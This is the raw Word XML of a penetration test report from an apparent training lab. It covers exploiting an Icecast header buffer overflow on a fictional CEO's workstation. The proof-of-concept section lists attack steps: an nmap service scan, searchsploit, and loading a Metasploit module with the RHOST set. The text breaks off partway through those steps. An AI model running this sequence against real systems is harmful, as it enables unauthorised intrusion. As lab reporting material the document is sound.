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6B3E4" w14:textId="5A8176C4" w:rsidR="00F405DA" w:rsidRDefault="0095515C" w:rsidP="00A734A3">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B618D7" w14:textId="2A2277DC" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Penetration Test Report </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46546001" w14:textId="2DF3DA49" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="5205D07F" w14:textId="6A85E1EC" w:rsidR="00A734A3" w:rsidRPr="00BC4C7A" w:rsidRDefault="0095515C" w:rsidP="00BC4C7A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00BC5B77" w:rsidRPr="000B5106">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
          </w:rPr>
          <w:t>JamesGastelum@GoodSecurity.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41AD3B53" w14:textId="77777777" w:rsidR="00BC4C7A" w:rsidRPr="00BC4C7A" w:rsidRDefault="00BC4C7A" w:rsidP="00BC4C7A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F12E20" w14:textId="24153A0C" w:rsidR="00A734A3" w:rsidRPr="00BC4C7A" w:rsidRDefault="00BC5B77" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>11/29/2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D2A10A" w14:textId="5378E5D5" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6015F71E" w14:textId="45B61277" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74EF2D87" w14:textId="16B28D21" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ADCF2D8" w14:textId="695D29B9" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36169592" w14:textId="1B74C314" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="696CA337" w14:textId="07BE63BA" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E049BE1" w14:textId="01DCE141" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11BA3E47" w14:textId="30F3DE19" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169C2752" w14:textId="7F9D3E24" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E65E49C" w14:textId="3600267D" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED15FE1" w14:textId="015805BF" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E11D0C" w14:textId="5F2412BA" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05EF45D9" w14:textId="47575093" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBB00D3" w14:textId="501B8E4B" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2EC5F6" w14:textId="396D4BBB" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30FF04D9" w14:textId="4269D059" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="706AC62A" w14:textId="4B411F4F" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5B02D3" w14:textId="6A882C6B" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051D07ED" w14:textId="45C5B6A9" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CFD47A3" w14:textId="2BB214AE" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0899EA00" w14:textId="6CBA5309" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>High-Level Summary</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="7E2F0406" w14:textId="77777777" w:rsidR="00A734A3" w:rsidRPr="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="642B3BCA" w14:textId="04B5F739" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was tasked with performing an internal penetration test on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodCorp’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CEO, Hans Gruber. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Hans’ computer and determine if it is at risk. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> overall objective was to exploit any vulnerable software and find the secret recipe file on Hans’ computer, while reporting the findings back to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodCorp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A19DA8" w14:textId="77777777" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>When performing the internal penetration test, there were several alarming vulnerabilities that were</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147A956C" w14:textId="0639D3E1" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">identified on Hans’ desktop. When performing the attacks, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was able to gain access to his machine and find the secret recipe file by exploit two programs that had major vulnerabilities. The details of the attack can be found in the ‘Findings’ category.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73822325" w14:textId="628B3C6C" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="1299F05A" w14:textId="36A65C80" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="27376FFF" w14:textId="14D046C8" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="15382287" w14:textId="25914D8A" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="52587F53" w14:textId="77777777" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="2C21675F" w14:textId="18876FAC" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="1ED3C9E4" w14:textId="3DF4F058" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="78B52280" w14:textId="57F99417" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="1CB31F7B" w14:textId="1ECB8575" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="00CB8FD5" w14:textId="1C5985F2" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="317444CC" w14:textId="548007B5" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="4EB498C9" w14:textId="01563A14" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="63FEC9AF" w14:textId="408C3629" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="5E06A44D" w14:textId="5BBF5CED" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="575CE835" w14:textId="0756DD93" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329488F5" w14:textId="09EE82A4" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="1E167CDC" w14:textId="5A299957" w:rsidR="00A734A3" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:r>
        <w:t>Machine IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EC8BDB" w14:textId="4026BB4F" w:rsidR="00484430" w:rsidRDefault="00BC5B77" w:rsidP="00A734A3">
      <w:r>
        <w:t>192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4760934F" w14:textId="29C55D75" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:r>
        <w:t>Hostname:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139F1D09" w14:textId="64ED746A" w:rsidR="00484430" w:rsidRDefault="00BC5B77" w:rsidP="00A734A3">
      <w:r>
        <w:t>DVW10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B80E0AE" w14:textId="413E0DCC" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:r>
        <w:t>Vulnerability Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A42FAB" w14:textId="794C9942" w:rsidR="00484430" w:rsidRDefault="00BC5B77" w:rsidP="00A734A3">
      <w:r>
        <w:t>Used exploit/windows/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>icecast_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46FD1EC4" w14:textId="39D26657" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:r>
        <w:t>Vulnerability Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA070CA" w14:textId="533A659F" w:rsidR="00BC5B77" w:rsidRPr="00BC5B77" w:rsidRDefault="00BC5B77" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC5B77">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer overflow in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC5B77">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC5B77">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.</w:t>
      </w:r>
      <w:r w:rsidR="0036588D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC5B77">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">This exploit uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC5B77">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ExitThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC5B77">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC5B77">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">), this will leave </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC5B77">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC5B77">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> thinking the thread is still in use, and the thread counter won’t be decremented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3A26BD" w14:textId="2739107D" w:rsidR="0036588D" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:r>
        <w:t>Severity</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0036588D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="0036588D">
        <w:br/>
        <w:t>High Severity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E8A68A" w14:textId="054B960C" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:r>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2795A5BF" w14:textId="77777777" w:rsidR="00B77EE2" w:rsidRDefault="00B77EE2" w:rsidP="00B77EE2">
      <w:r>
        <w:t>You've been provided full access to the network and are getting ping responses from the CEO’s workstation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473BD4FB" w14:textId="77777777" w:rsidR="00B77EE2" w:rsidRDefault="00B77EE2" w:rsidP="00B77EE2">
      <w:r>
        <w:t xml:space="preserve">1. Perform a service and version scan using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to determine which services are up and running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6387F3C7" w14:textId="3FDDC31A" w:rsidR="00484430" w:rsidRPr="00A734A3" w:rsidRDefault="00B77EE2" w:rsidP="00B77EE2">
      <w:r>
        <w:t xml:space="preserve">    - Run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command that performs a service and version scan against the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAEC3FF" w14:textId="77777777" w:rsidR="00DB4FEC" w:rsidRDefault="00B77EE2" w:rsidP="00A734A3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B77EE2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B77EE2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B77EE2">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B77EE2">
        <w:t xml:space="preserve"> 192.168.0.20</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DB4FEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C9A99E0" wp14:editId="3FC0349A">
            <wp:extent cx="5943600" cy="4764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764405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5225FBDC" w14:textId="77777777" w:rsidR="00DB4FEC" w:rsidRDefault="00DB4FEC" w:rsidP="00DB4FEC">
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">2. From the previous step, we see that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service is running. Let's start by attacking that service. Search for any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C82F71" w14:textId="1B522C18" w:rsidR="00A734A3" w:rsidRDefault="00DB4FEC" w:rsidP="00DB4FEC">
      <w:r>
        <w:t xml:space="preserve">    - Run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SearchSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> commands to show available </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5388A1DF" w14:textId="5C2C54A3" w:rsidR="00DB4FEC" w:rsidRDefault="00DB4FEC" w:rsidP="00A734A3">
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0296CDD8" w14:textId="6E639B34" w:rsidR="00DB4FEC" w:rsidRDefault="00DB4FEC" w:rsidP="00A734A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E45FB85" wp14:editId="4D829DE1">
            <wp:extent cx="5943600" cy="495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954270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2887BBB4" w14:textId="77777777" w:rsidR="00077787" w:rsidRDefault="00077787" w:rsidP="00077787">
      <w:r>
        <w:t xml:space="preserve">3. Now that we know which exploits are available to us, let's start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A313AA0" w14:textId="48DB9E8A" w:rsidR="00077787" w:rsidRDefault="00077787" w:rsidP="00077787">
      <w:r>
        <w:t xml:space="preserve">    - Run the command that starts </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F510EB" w14:textId="2B42B256" w:rsidR="00074ED1" w:rsidRDefault="00077787" w:rsidP="00A734A3">
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E7BE62A" w14:textId="1239A038" w:rsidR="00077787" w:rsidRDefault="00077787" w:rsidP="00A734A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47C43858" wp14:editId="6BA142B9">
            <wp:extent cx="5943600" cy="4837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837430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C1D8E4" w14:textId="77777777" w:rsidR="0028799E" w:rsidRDefault="0028799E" w:rsidP="0028799E">
      <w:r>
        <w:t xml:space="preserve">4. Search for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> module and load it for use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3EC32A" w14:textId="00F528BD" w:rsidR="0028799E" w:rsidRDefault="0028799E" w:rsidP="0028799E">
      <w:r>
        <w:t xml:space="preserve">    - Run the command to search for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AF47F0" w14:textId="77777777" w:rsidR="00684D8C" w:rsidRDefault="0028799E" w:rsidP="0028799E">
      <w:r>
        <w:t xml:space="preserve">          &gt; search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="323EA838" w14:textId="4C0D77EA" w:rsidR="00684D8C" w:rsidRDefault="00684D8C" w:rsidP="0028799E">
      <w:r w:rsidRPr="00684D8C">
        <w:t xml:space="preserve">- Run the command to use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00684D8C">
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00684D8C">
        <w:t xml:space="preserve"> module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EEC17C" w14:textId="77777777" w:rsidR="00684D8C" w:rsidRDefault="00684D8C" w:rsidP="00684D8C">
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&gt; use 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>5.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Set the `RHOST` to the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBE1CC8" w14:textId="2DF15CBF" w:rsidR="00684D8C" w:rsidRDefault="00684D8C" w:rsidP="00684D8C">
      <w:r>
        <w:t xml:space="preserve">    - Run the command that sets the `RHOST</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>`:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">         &gt; set RHOST 192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70211723" w14:textId="1F7FDA5D" w:rsidR="0028799E" w:rsidRDefault="0028799E" w:rsidP="0028799E">
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00684D8C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
